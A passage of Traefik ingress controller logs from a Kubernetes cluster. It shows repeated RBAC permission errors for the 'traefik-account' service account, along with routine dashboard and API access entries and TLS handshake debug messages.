k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:23:13.854088 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:23:14 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 163 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:23:14 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 164 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:23:19 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 165 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:23:19 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 166 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:23:24 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 167 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:23:24 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 168 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:23:29 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 169 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:23:29 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 170 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:23:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 171 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:23:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 172 "api@internal" "-" 0ms +W0330 07:23:35.355584 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:23:35.355652 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:23:39 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 173 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:23:39 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 174 "api@internal" "-" 0ms +W0330 07:23:44.133416 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:23:44.133450 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:23:44 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 175 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:23:44 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 176 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:23:49 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 177 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:23:49 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 178 "api@internal" "-" 0ms +W0330 07:23:49.203443 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:23:49.203483 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:23:51.033556 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:23:51.033595 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:23:54 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 179 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:23:54 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 180 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:23:59 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 181 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:23:59 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 182 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:24:04 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 183 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:24:04 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 184 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:24:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 185 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:24:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 186 "api@internal" "-" 0ms +W0330 07:24:13.833643 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:24:13.833685 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:24:14 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 187 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:24:14 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 188 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:24:19 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 189 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:24:19 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 190 "api@internal" "-" 0ms +W0330 07:24:21.900384 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:24:21.900429 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:24:24 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 191 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:24:24 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 192 "api@internal" "-" 0ms +W0330 07:24:29.600692 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:24:29.600777 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:24:29 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 193 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:24:29 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 194 "api@internal" "-" 0ms +W0330 07:24:31.671123 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:24:31.671176 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:24:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 195 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:24:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 196 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:24:39 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 197 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:24:39 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 198 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:24:44 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 199 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:24:44 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 200 "api@internal" "-" 0ms +W0330 07:24:45.564444 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:24:45.564477 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:24:49 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 201 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:24:49 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 202 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:24:54 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 203 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:24:54 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 204 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:24:59 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 205 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:24:59 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 206 "api@internal" "-" 0ms +time="2024-03-30T07:25:00Z" level=debug msg="http: TLS handshake error from 10.0.0.4:52563: EOF" +10.2.0.129 - - [30/Mar/2024:07:25:04 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 208 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:25:04 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 207 "api@internal" "-" 1ms +10.2.0.129 - - [30/Mar/2024:07:25:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 209 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:25:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 210 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:25:14 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 211 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:25:14 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 212 "api@internal" "-" 0ms +W0330 07:25:14.485963 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:25:14.485994 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:25:17.067190 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:25:17.067216 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:25:19 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 213 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:25:19 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 214 "api@internal" "-" 0ms +W0330 07:25:20.794831 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:25:20.794863 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:25:24 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 215 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:25:24 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 216 "api@internal" "-" 0ms +W0330 07:25:28.663858 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:25:28.663894 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:25:29 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 217 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:25:29 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 218 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:25:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 219 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:25:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 220 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:25:39 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 221 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:25:39 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 222 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:25:44 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 223 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:25:44 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 224 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:25:49 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 225 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:25:49 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 226 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:25:54 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 227 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:25:54 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 228 "api@internal" "-" 0ms +W0330 07:25:58.795743 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:25:58.795864 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:25:59 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 229 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:25:59 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 230 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:26:04 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 231 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:04 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 232 "api@internal" "-" 0ms +W0330 07:26:05.574714 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:26:05.574744 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:26:06.899346 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:26:06.899395 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:26:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 233 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:26:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 234 "api@internal" "-" 0ms +W0330 07:26:09.156439 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:26:09.156469 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:26:14 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 235 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:14 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 236 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:19 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 237 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:26:19 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 238 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:26:21 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 239 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:26:24 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 240 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:24 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 241 "api@internal" "-" 0ms +time="2024-03-30T07:26:24Z" level=debug msg="http: TLS handshake error from 10.2.1.1:10751: remote error: tls: unknown certificate" +time="2024-03-30T07:26:24Z" level=debug msg="Serving default certificate for request: \"whoami.172.233.168.9.nip.io\"" +10.2.0.129 - - [30/Mar/2024:07:26:24 +0000] "GET / HTTP/2.0" 404 19 "-" "-" 242 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:28 +0000] "GET / HTTP/2.0" 404 19 "-" "-" 243 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:26:29 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 244 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:29 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 245 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 246 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:26:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 247 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:26:38 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 248 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:38 +0000] "GET /dashboard/ HTTP/1.1" 200 1163 "-" "-" 249 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:26:38 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 250 "api@internal" "-" 0ms +time="2024-03-30T07:26:38Z" level=debug msg="Serving default certificate for request: \"172-233-169-13.ip.linodeusercontent.com\"" +10.2.0.129 - - [30/Mar/2024:07:26:38 +0000] "GET /dashboard/css/vendor.609cd54c.css HTTP/1.1" 200 224744 "-" "-" 251 "dashboard@internal" "-" 1ms +time="2024-03-30T07:26:38Z" level=debug msg="http: TLS handshake error from 10.0.0.4:12219: remote error: tls: unknown certificate" +10.2.1.1 - - [30/Mar/2024:07:26:38 +0000] "GET /dashboard/css/app.d96a5235.css HTTP/1.1" 200 4333 "-" "-" 252 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:26:38 +0000] "GET /dashboard/js/app.abf00464.js HTTP/1.1" 200 41280 "-" "-" 254 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:38 +0000] "GET /dashboard/js/vendor.5cc359a9.js HTTP/1.1" 200 1223091 "-" "-" 253 "dashboard@internal" "-" 209ms +10.2.0.129 - - [30/Mar/2024:07:26:40 +0000] "GET /dashboard/css/8.cb89174c.css HTTP/1.1" 200 944 "-" "-" 255 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:26:40 +0000] "GET /dashboard/css/chunk-common.52fcdaa7.css HTTP/1.1" 200 4938 "-" "-" 257 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:26:40 +0000] "GET /dashboard/js/chunk-common.5363bb20.js HTTP/1.1" 200 52039 "-" "-" 256 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:40 +0000] "GET /dashboard/js/8.7e674596.js HTTP/1.1" 200 18550 "-" "-" 258 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:26:40 +0000] "GET /dashboard/css/2.fea02e71.css HTTP/1.1" 200 662 "-" "-" 259 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:40 +0000] "GET /dashboard/js/11.a675a95e.js HTTP/1.1" 200 1950 "-" "-" 260 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:26:40 +0000] "GET /dashboard/js/2.f326ab8a.js HTTP/1.1" 200 2645 "-" "-" 261 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:26:41 +0000] "GET /api/version HTTP/1.1" 200 86 "-" "-" 262 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:26:41 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 263 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:41 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 264 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:41 +0000] "GET /dashboard/fonts/nunito-v11-latin-700.bf2c237c.woff2 HTTP/1.1" 200 20128 "-" "-" 266 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:41 +0000] "GET /dashboard/fonts/Eva-Icons.ac165c67.woff2 HTTP/1.1" 200 25952 "-" "-" 267 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:26:41 +0000] "GET /dashboard/fonts/flUhRq6tzZclQEJ-Vdg-IuiaDsNcIhQ8tQ.c5371cfb.woff2 HTTP/1.1" 200 128616 "-" "-" 265 "dashboard@internal" "-" 1ms +10.2.1.1 - - [30/Mar/2024:07:26:41 +0000] "GET /dashboard/fonts/nunito-v11-latin-regular.e1a82f09.woff2 HTTP/1.1" 200 19976 "-" "-" 268 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:26:41 +0000] "GET /dashboard/fonts/nunito-v11-latin-600.5a8861ee.woff2 HTTP/1.1" 200 20084 "-" "-" 269 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:41 +0000] "GET /dashboard/providers/internal.svg HTTP/1.1" 200 3681 "-" "-" 270 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:41 +0000] "GET /dashboard/fonts/KFOlCnqEu92Fr1MmYUtfBBc-.f5677eb2.woff HTTP/1.1" 200 20424 "-" "-" 271 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:26:41 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=2 HTTP/1.1" 400 53 "-" "-" 272 "api@internal" "-" 0ms +W0330 07:26:41.846689 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:26:41.846788 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +10.2.1.1 - - [30/Mar/2024:07:26:41 +0000] "GET /dashboard/icons/favicon.ico HTTP/1.1" 200 10134 "-" "-" 273 "dashboard@internal" "-" 0ms +W0330 07:26:43.838366 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster 